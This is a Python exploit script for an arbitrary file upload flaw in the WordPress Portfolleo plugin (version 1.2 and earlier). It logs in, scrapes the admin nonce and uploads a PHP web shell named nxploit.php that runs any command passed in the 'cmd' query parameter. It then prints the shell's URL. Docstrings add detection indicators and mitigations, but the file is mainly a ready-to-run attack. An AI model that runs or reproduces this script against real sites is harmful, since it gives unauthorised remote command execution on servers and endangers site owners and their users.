import requests
import time
import argparse
from bs4 import BeautifulSoup
# Author banner (ASCII art plus credit line). It is purely cosmetic and is
# printed at module level, outside the __main__ guard, so it is emitted on
# import as well as when the file is run as a script.
banner = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! @@!@! @@! @@@ !@@ !@@ @@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@!!@! !@! @!@ !@! !@! @!@
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ @!! @!! !!@!!@!! !!@@!@! !!@@!! @!@!!@
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! !!! !@! !!@!!! @!!@!!!! @!!@!!! !!@!@!
:!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: :!!:!:!!: !!! !:! !:! !:! !!:
:!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: !:::!!::: !:! :!: !:! !:! :!:
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: ::: ::::: :: :::: ::: :::: :: :: ::::
:: :: : : : :: :: :: : ::: : : : : :: : ::: ::: ::: : : : :: : : :: : : : : :
By:Nxploited | Khaled Alenazi,
"""
print(banner)
def parse_arguments():
    """Parse the command line and return the resulting namespace.

    All three options are mandatory: the site base URL plus a WordPress
    username and password. The password is taken as a plain argument, so it
    ends up in shell history and in the process listing of the host the
    script runs on.
    """
    cli = argparse.ArgumentParser(
        description="WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi",
    )
    cli.add_argument(
        "-u",
        "--url",
        required=True,
        help="Base URL of the site (e.g. http://192.168.100.74:888/wordpress)",
    )
    cli.add_argument(
        "-U",
        "--username",
        dest="username",
        required=True,
        help="WordPress username",
    )
    cli.add_argument(
        "-p",
        "--password",
        required=True,
        help="WordPress password",
    )
    return cli.parse_args()
def create_session():
    """Return the ``requests.Session`` shared by every later request.

    TLS certificate verification is turned off on the session, so the
    credentials posted by ``login`` travel over a connection whose peer
    identity is never checked.
    """
    # disable_warnings() alters the warning filters for the whole process,
    # not just for this session, which hides the InsecureRequestWarning that
    # verify=False would otherwise trigger.
    requests.packages.urllib3.disable_warnings()
    http = requests.Session()
    http.verify = False
    return http
def login(session, url, username, password):
    """POST the WordPress login form and return the raw response.

    The form goes to ``<url>/wp-login.php`` with a fixed ``Mozilla/5.0``
    User-Agent. Success is not evaluated here; the caller inspects the
    session cookies afterwards (see ``check_login``).
    """
    endpoint = "{}/wp-login.php".format(url)
    browser_headers = {"User-Agent": "Mozilla/5.0"}
    form = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In',
    }
    return session.post(endpoint, data=form, headers=browser_headers)
def check_login(session):
    """Return True when the session holds a WordPress login cookie.

    The test is a substring match for ``wordpress_logged_in`` on each cookie
    name, so any suffix appended to the name is ignored.
    """
    for jar_entry in session.cookies:
        if 'wordpress_logged_in' in jar_entry.name:
            return True
    return False
def get_nonce(session, url, portfolio_path):
    """Fetch the plugin admin page and return its ``_wpnonce`` form value.

    The page at ``<url>/<portfolio_path>`` is requested with the logged-in
    session and parsed with BeautifulSoup; the value of the first
    ``<input name="_wpnonce">`` is returned.
    """
    page = session.get(
        "{}/{}".format(url, portfolio_path),
        headers={"User-Agent": "Mozilla/5.0"},
    )
    document = BeautifulSoup(page.text, 'html.parser')
    nonce_field = document.find('input', {'name': '_wpnonce'})
    # No guard here: when the field is absent, find() returns None and the
    # subscript below raises TypeError.
    return nonce_field['value']
def upload_shell(session, url, nonce, portfolio_path):
    """Submit the plugin's "Add To Portfolio" form with a PHP file attached.

    One multipart POST is sent to ``<url>/wp-admin/options.php``. The
    ``fileupload`` part carries a file named ``nxploit.php`` declared as
    ``application/x-php``; the remaining fields mirror the plugin form and
    include the nonce obtained from the admin page. The response is returned
    unchecked.

    For detection: in access logs this is an authenticated POST to
    ``/wp-admin/options.php`` with a multipart body, and ``main`` reports the
    resulting file under ``wp-content/portfolleo/``. Requests for ``.php``
    files in that directory, especially with a ``cmd`` query parameter, are
    the follow-on indicator. Refusing PHP execution in that directory and
    validating the uploaded file type server-side are the mitigations this
    request depends on being absent.
    """
    # presumably the account must be permitted to reach wp-admin/options.php;
    # the required role is not visible in this script - verify against the plugin.
    target = "{}/wp-admin/options.php".format(url)
    attachment = {
        'fileupload': (
            'nxploit.php',
            '<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>',
            'application/x-php',
        ),
    }
    fields = {
        '_wpnonce': nonce,
        '_wp_http_referer': '/{}'.format(portfolio_path),
        'name': 'profile',
        'dob': '23/03/2025',
        'desc': 'Im Nxploited , Khaled Alenazi',
        'action': 'update',
        'page_options': 'name,dob,desc,datafile',
        'submit': 'Add To Portfolio',
    }
    return session.post(
        target,
        headers={"User-Agent": "Mozilla/5.0"},
        files=attachment,
        data=fields,
    )
def main():
    """Run the flow end to end: log in, read the nonce, submit the upload.

    The process stops after a failed login. The final two messages are
    printed unconditionally: the upload response is never inspected, so the
    tool's output alone does not show that a file was written on the
    server.
    """
    opts = parse_arguments()
    http = create_session()
    login(http, opts.url, opts.username, opts.password)

    if not check_login(http):
        print("[-] Failed to log in.")
        exit()
    print("[+] Logged in successfully.")

    # Admin page of the plugin; the form on it supplies the _wpnonce value.
    portfolio_path = "wp-admin/admin.php?page=portfolleo"
    token = get_nonce(http, opts.url, portfolio_path)
    print("[+] Extracted _wpnonce: {}".format(token))

    upload_shell(http, opts.url, token, portfolio_path)
    print("[+] Shell has been uploaded.")
    print(f"[*] Check the shell here: {opts.url}/wp-content/portfolleo/nxploit.php")


if __name__ == "__main__":
    main()